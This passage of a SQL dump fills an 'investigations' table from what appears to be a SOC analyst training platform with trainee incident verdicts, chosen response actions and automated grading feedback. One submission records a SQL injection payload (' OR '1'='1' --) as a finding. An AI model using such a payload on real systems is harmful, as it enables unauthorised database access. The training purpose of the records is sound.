(158, 74, 950, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"Malicious link in phidhing email\",\"submitted_at\":\"2026-01-17T08:45:12.141Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts (0/2). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-01-17 08:43:36', '2026-01-31 21:00:01', 0, NULL),
(159, 74, 991, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2026-01-17T08:47:53.790Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts (0/3). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-01-17 08:46:40', '2026-01-31 21:00:01', 0, NULL),
(160, 74, 992, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2026-01-17T08:49:00.518Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts (0/3). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-01-17 08:47:53', '2026-01-31 21:00:01', 0, NULL),
(161, 74, 993, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-17 08:49:00', '2026-01-17 08:49:00', 0, NULL),
(162, 52, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-19 08:45:34', '2026-01-19 08:45:34', 0, NULL),
(163, 52, 707, 'investigating', NULL, NULL, NULL, '{\"verdict_correctness\":\"Incorrect\",\"key_findings\":\"Incorrect verdict. Expected true_positive, got benign. Missed critical artifacts (0/1). Missed response actions (2/3)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-01-19 08:46:26', '2026-01-19 08:57:52', 0, NULL),
(164, 91, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-20 10:38:53', '2026-01-20 10:38:53', 0, NULL),
(165, 93, 268, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"block_hash\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"An email from abc123@example.com which is detected for unusual activity sent to employee@corporate.com which had an malware attachment named urgent_document and the subject was urgent warning , when an email is sent as urgently it has higher chances to be phishing \\nemail was sent from external IP - 203.0.113.45 which is known for phishing campaigns.\",\"submitted_at\":\"2026-01-20T21:20:08.170Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts (0/2). Missed response actions (3/4)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-01-20 20:57:32', '2026-01-31 21:00:01', 0, NULL),
(166, 93, 728, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"A malicious IP from outside tried to bruteforce the internal network server. Malicious IP was reported 174 times for bruteforce earlier.\",\"submitted_at\":\"2026-01-20T21:01:30.744Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts (0/1). Missed response actions (2/3)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-01-20 20:57:43', '2026-01-31 21:00:01', 0, NULL),
(167, 93, 283, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"An external IP 203.0.113.45 tried to access an internal IP 192.168.1.10 and it was too much failure attemps , so they didnt success to connect and find the password.\",\"submitted_at\":\"2026-01-20T21:08:02.426Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts (0/2). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-01-20 21:02:24', '2026-01-31 21:00:01', 0, NULL),
(168, 93, 948, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"An external IP - 203.0.113.45 whish is reported 847 times as malicious did bruteforce to the internal user of the organization jdoe with ip - 192.168.1.10 / workstation01- and had 35 failed attempts.\",\"submitted_at\":\"2026-01-20T21:13:10.766Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts (0/1). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-01-20 21:08:22', '2026-01-31 21:00:01', 0, NULL),
(169, 93, 269, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-20 21:20:08', '2026-01-20 21:20:08', 0, NULL),
(170, 94, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-21 01:57:29', '2026-01-21 01:57:29', 0, NULL),
(171, 95, 268, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"artefatos maliciosos detectados\",\"submitted_at\":\"2026-01-21T18:59:04.089Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts (0/2). Missed response actions (3/4)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-01-21 17:18:27', '2026-01-31 21:00:01', 0, NULL),
(172, 95, 761, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"test de analise.\",\"submitted_at\":\"2026-01-21T18:41:12.896Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts (0/2). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-01-21 18:36:11', '2026-01-31 21:00:01', 0, NULL),
(173, 95, 625, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"test\",\"submitted_at\":\"2026-01-21T18:44:05.291Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts (0/1). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-01-21 18:42:03', '2026-01-31 21:00:01', 0, NULL),
(174, 95, 227, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_2\",\"artifact_3\",\"artifact_5\",\"artifact_6\"],\"selectedActions\":[\"escalate\",\"collect_forensics\",\"reset_credentials\",\"block_hash\",\"block_ip\",\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"test\",\"submitted_at\":\"2026-01-21T18:53:10.865Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts (0/2). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-01-21 18:44:37', '2026-01-31 21:00:01', 0, NULL),
(175, 95, 269, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-21 18:59:04', '2026-01-21 18:59:04', 0, NULL),
(179, 34, 607, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2026-01-22T03:11:59.323Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/3)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-01-22 03:11:21', '2026-01-31 21:00:01', 0, NULL),
(182, 96, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-22 04:14:25', '2026-01-22 04:14:25', 0, NULL),
(183, 96, 621, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2026-01-22T04:16:29.689Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-01-22 04:14:42', '2026-01-31 21:00:01', 0, NULL),
(184, 96, 226, 'investigating', NULL, NULL, NULL, NULL, '2026-01-22 09:46:47', '2026-01-22 06:36:47', '2026-01-22 06:36:47', 0, NULL),
(187, 56, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-23 06:03:09', '2026-01-23 06:03:09', 0, NULL),
(188, 42, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-23 08:19:36', '2026-01-23 08:19:36', 0, NULL),
(190, 97, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-25 05:05:04', '2026-01-25 05:05:04', 0, NULL),
(191, 98, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-25 08:18:38', '2026-01-25 08:18:38', 0, NULL),
(192, 98, 282, 'investigating', NULL, NULL, NULL, NULL, '2026-01-25 11:45:46', '2026-01-25 08:37:46', '2026-01-25 08:37:46', 0, NULL),
(193, 99, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-25 15:14:16', '2026-01-25 15:14:16', 0, NULL),
(195, 74, 1086, 'investigating', NULL, NULL, NULL, NULL, '2026-01-25 19:28:41', '2026-01-25 16:19:41', '2026-01-25 16:19:41', 0, NULL),
(196, 102, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-25 21:55:00', '2026-01-25 21:55:00', 0, NULL),
(197, 107, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-27 19:45:55', '2026-01-27 19:45:55', 0, NULL),
(198, 108, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-27 19:55:53', '2026-01-27 19:55:53', 0, NULL),
(199, 109, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-27 21:08:02', '2026-01-27 21:08:02', 0, NULL),
(200, 107, 233, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"Confirmed phishing incident involving a spoofed banking domain and malicious credential-harvesting URL. \\nIOCs (IP, URL, sender domain) were enriched via OSINT and validated as malicious. \\nActivity mapped to MITRE ATT&CK T1566. \\nContainment actions included blocking the IP/domain and forcing credential reset for the affected user.\\nVerdict: True Positive.\\n\",\"submitted_at\":\"2026-01-28T15:04:50.937Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/3)\",\"missed_items\":[\"block_url\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-01-28 14:35:51', '2026-01-31 21:00:01', 0, NULL),
(201, 107, 224, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_2\",\"artifact_4\",\"artifact_5\",\"artifact_6\",\"artifact_7\",\"artifact_8\",\"artifact_3\",\"artifact_1\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"Encoded PowerShell activity and a known malicious IP were identified, confirming an active C2 communication attempt. OSINT and hash analysis verified malware presence. Affected host and account were contained to prevent further compromise.\\n\\nVerdict: True Positive.\",\"submitted_at\":\"2026-01-28T16:29:47.262Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-01-28 15:35:44', '2026-01-31 21:00:01', 0, NULL),
(202, 115, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-31 12:38:02', '2026-01-31 12:38:02', 0, NULL),
(203, 116, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-01 09:07:07', '2026-02-01 09:07:07', 0, NULL),
(204, 116, 1104, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"block_hash\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2026-02-01T09:11:43.826Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/5)\",\"missed_items\":[\"isolate_host\",\"collect_forensics\",\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-01 09:09:51', '2026-02-28 21:00:00', 0, NULL),
(205, 116, 1105, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-01 09:11:43', '2026-02-01 09:11:43', 0, NULL),
(206, 123, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-02 10:07:03', '2026-02-02 10:07:03', 0, NULL),
(207, 124, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-02 10:09:53', '2026-02-02 10:09:53', 0, NULL),
(208, 125, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-04 01:34:01', '2026-02-04 01:34:01', 0, NULL),
(209, 126, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-04 22:06:35', '2026-02-04 22:06:35', 0, NULL),
(210, 74, 1141, 'investigating', NULL, NULL, NULL, NULL, '2026-02-05 11:34:26', '2026-02-05 08:26:26', '2026-02-05 08:26:26', 0, NULL),
(211, 65, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-05 16:49:25', '2026-02-05 16:49:25', 0, NULL),
(212, 65, 636, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2026-02-05T17:01:34.233Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-05 16:52:31', '2026-02-28 21:00:00', 0, NULL),
(213, 127, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-05 17:48:46', '2026-02-05 17:48:46', 0, NULL),
(215, 128, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-07 01:17:23', '2026-02-07 01:17:23', 0, NULL),
(216, 129, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-07 21:51:46', '2026-02-07 21:51:46', 0, NULL),
(217, 129, 949, 'investigating', NULL, NULL, NULL, NULL, '2026-02-08 01:02:48', '2026-02-07 21:52:48', '2026-02-07 21:52:48', 0, NULL),
(218, 131, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-08 08:16:29', '2026-02-08 08:16:29', 0, NULL),
(219, 133, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-08 16:07:44', '2026-02-08 16:07:44', 0, NULL),
(220, 135, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-08 17:42:27', '2026-02-08 17:42:27', 0, NULL),
(221, 136, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-09 22:07:29', '2026-02-09 22:07:29', 0, NULL),
(222, 136, 1225, 'investigating', NULL, NULL, NULL, NULL, '2026-02-10 01:20:43', '2026-02-09 22:12:43', '2026-02-09 22:12:43', 0, NULL),
(223, 137, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-10 12:44:50', '2026-02-10 12:44:50', 0, NULL),
(225, 138, 268, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-203.0.113.45\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2026-02-11T17:09:07.813Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)\",\"missed_items\":[\"block_hash\",\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-11 17:02:53', '2026-02-28 21:00:00', 0, NULL),
(226, 140, 268, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-10.0.0.15\",\"ip-203.0.113.45\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"Subject identified as True Positive. Suspicious email contained malware detected by OSINT scan. Hash was identified to be malicious. Senders IP address is known to be associated with phishing organization. IP address was blocked on Firewall. Hash was also blocked on all host machines.\",\"submitted_at\":\"2026-02-11T17:16:22.373Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)\",\"missed_items\":[\"collect_forensics\",\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-11 17:05:54', '2026-02-28 21:00:00', 0, NULL),
(227, 138, 269, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-11 17:09:07', '2026-02-11 17:09:07', 0, NULL),
(228, 140, 269, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.50\",\"ip-192.168.1.45\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"Subject is True Positive. The file hash is identified as Malicious. Senders IP address has been identified and is associated with malicious behavior and common phishing campaigns. Host has been quarantined. Senders IP address has been blacklisted in firewall. File hash has been blocked on all hosts. Escalated issue.\",\"submitted_at\":\"2026-02-11T17:33:57.651Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-11 17:16:22', '2026-02-28 21:00:00', 0, NULL),
(229, 140, 270, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-11 17:33:57', '2026-02-11 17:33:57', 0, NULL),
(230, 141, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-12 03:16:23', '2026-02-12 03:16:23', 0, NULL),
(231, 141, 729, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.0.0.20\",\"hash-e99a18c4\",\"cmd-1\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"block_ip\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"Based on the artifacts provided, this is assessed as a True Positive malware infection on internal host 10.0.0.20. The file path, executable type, and hash artifact collectively indicate malicious activity requiring containment and further forensic investigation.\\n\\nImmediate response and broader IOC hunting are advised.\",\"submitted_at\":\"2026-02-12T04:13:30.182Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts: command C:\\\\malicious_folder\\\\malware.exe (1/2). Missed response actions (3/4)\",\"missed_items\":[\"command: C:\\\\malicious_folder\\\\malware.exe\",\"close_alert\"],\"strengths\":\"Needs improvement\"}', NULL, '2026-02-12 04:07:49', '2026-02-28 21:00:00', 0, NULL),
(232, 141, 253, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.101\",\"ip-203.0.113.45\",\"hash-abc123de\",\"domain-malicious-ex\"],\"selectedActions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"On 2023-10-01 at 14:23:45 UTC, the Security Operations Center detected a process execution event on internal workstation DESKTOP-1A2B3C (192.168.1.101) associated with user account jdoe. The executed process (hash: abc123def456ghi789jkl012mno345pq) initiated outbound communication to external IP 203.0.113.45 and resolved domain malicious-example.com.\\nGiven the active outbound connection, the incident is assessed as a High-Severity True Positive. The affected endpoint was isolated to prevent lateral movement, and the associated IP, domain, and file hash were blocked at perimeter and endpoint controls. User credentials for jdoe are under review pending validation of potential compromise.\",\"submitted_at\":\"2026-02-12T04:18:58.336Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-12 04:14:28', '2026-02-28 21:00:00', 0, NULL),
(233, 141, 957, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.77\",\"ip-10.0.0.5\",\"artifact_2\"],\"selectedActions\":[\"block_ip\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"On 2026-01-16 at 17:55:00 UTC, the SOC detected a network connection attempt originating from external IP 203.0.113.77 targeting internal asset secure-server (10.0.0.5) using the privileged account “admin.” Likely True Positive unauthorized access attempt and classified as Medium–High severity pending further log correlation. All attempts failed. Preventative measures, including verification of firewall rules, potential IP blocking, and validation of privileged account protections (e.g., MFA enforcement), are recommended to mitigate ongoing risk\",\"submitted_at\":\"2026-02-12T04:25:05.765Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/2)\",\"missed_items\":[\"reset_credentials\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-12 04:19:44', '2026-02-28 21:00:00', 0, NULL),
(234, 137, 239, 'investigating', NULL, NULL, NULL, NULL, '2026-02-13 02:53:11', '2026-02-12 23:43:11', '2026-02-12 23:43:11', 0, NULL),
(235, 137, 687, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-185.92.26.102\",\"ip-192.168.1.10\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\",\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2026-02-13T00:04:15.388Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/3)\",\"missed_items\":[\"close_alert\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-12 23:59:29', '2026-02-28 21:00:00', 0, NULL),
(236, 137, 229, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"hash-e99a18c4\",\"artifact_1\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"reset_credentials\",\"isolate_host\",\"escalate\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"Hash value detected as malware, and the user account has multiple failed login attempts. \",\"submitted_at\":\"2026-02-13T13:10:32.657Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Artifact analysis completed (+30). Missed response actions (3/4)\",\"missed_items\":[\"collect_forensics\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-13 00:05:11', '2026-02-28 21:00:00', 0, NULL),
(237, 142, 268, 'graded', 85, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-10.0.0.15\",\"ip-203.0.113.45\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"block_hash\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/6/2026, 9:16:16 PM\\nALERT: Phishing Email Detected [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 10.0.0.15\\n- [IP] 203.0.113.45\\n- [EMAIL] abc123@example.com\\n- [HASH] 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T05:16:28.583Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)\",\"missed_items\":[\"collect_forensics\",\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-14 06:28:27', '2026-03-07 05:16:28', 0, NULL),
(238, 142, 1234, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.45.12\",\"ip-203.0.113.89\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2026-02-14T06:32:08.123Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (4/5)\",\"missed_items\":[\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-14 06:29:28', '2026-02-28 21:00:00', 0, NULL),
(239, 145, 954, 'investigating', NULL, NULL, NULL, NULL, '2026-02-14 12:48:14', '2026-02-14 09:40:14', '2026-02-14 09:40:14', 0, NULL),
(240, 95, 252, 'investigating', NULL, NULL, NULL, NULL, '2026-02-14 18:05:55', '2026-02-14 14:55:55', '2026-02-14 14:55:55', 0, NULL),
(241, 153, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-15 01:39:11', '2026-02-15 01:39:11', 0, NULL);
INSERT INTO `investigations` (`id`, `user_id`, `alert_id`, `status`, `grade`, `feedback`, `executive_summary`, `ai_summary`, `ai_evaluation_scheduled_at`, `created_at`, `updated_at`, `is_reported`, `report_reason`) VALUES
(242, 99, 640, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-198.51.100.45\",\"ip-192.168.1.20\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 16/02/2026, 22:05:35\\nALERT: SQL Injection Attempt Detected\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 198.51.100.45\\n- [IP] 192.168.1.20\\n- [PAYLOAD] \' OR \'1\'=\'1\' --\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (2)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-16T17:06:58.731Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/2)\",\"missed_items\":[\"close_alert\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-15 05:10:28', '2026-02-28 21:00:00', 0, NULL),
